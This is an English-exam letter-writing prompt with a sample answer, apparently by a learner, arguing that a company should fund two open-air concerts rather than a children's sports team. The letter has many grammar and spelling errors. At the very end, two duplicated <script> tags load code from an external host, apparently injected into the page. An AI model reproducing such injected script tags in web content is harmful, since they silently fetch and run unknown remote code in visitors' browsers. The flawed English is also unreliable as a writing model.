A large company in your area has decided to spend a certain amount of money, either to sponsor a local children’s sports team for two years, or to pay for two open-air concerts. It has asked for feedback from the general public.
Write a letter to the company. In your letter
describe the benefits of sponsoring the sports team
summarise the benefits of paying for the concerts
say how you think the company should spend the money
Dear sir/madam,
I am Harry sandhu, a senior citizen of Greenwich Avenue, living here since 1990. I am writing this letter in connection to choose one out of two events you have planned to organise in our area.
First of all, I thankyou on behalf of all the residents of our area for sponsoring such event and asking our feedback for the same. Both the events weather sports sponsorship for local children or two open-air concerts have their own benefits. The former one will definitely encourage underprivileged youngsters to carry on their passion. Also, under the mentorship of experienced coach, they could polish their talent very well.
Open-air concert would expand the popularity of our area, as such events attracts audience from distant places as well. This will not only a mode of entertainment but also a source of income for the local government. Local people could also earn money by hosting shopping stalls or food stalls and not only that, the local people may get contract for work such as electrician, tent house, or event organisers. Therefore it is a win-win situation for us.
I believe that company should organise two open-air concerts as this event has more benefits in the form of entertainment, income and so on, in contrast to sports sponsorship for children. <script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
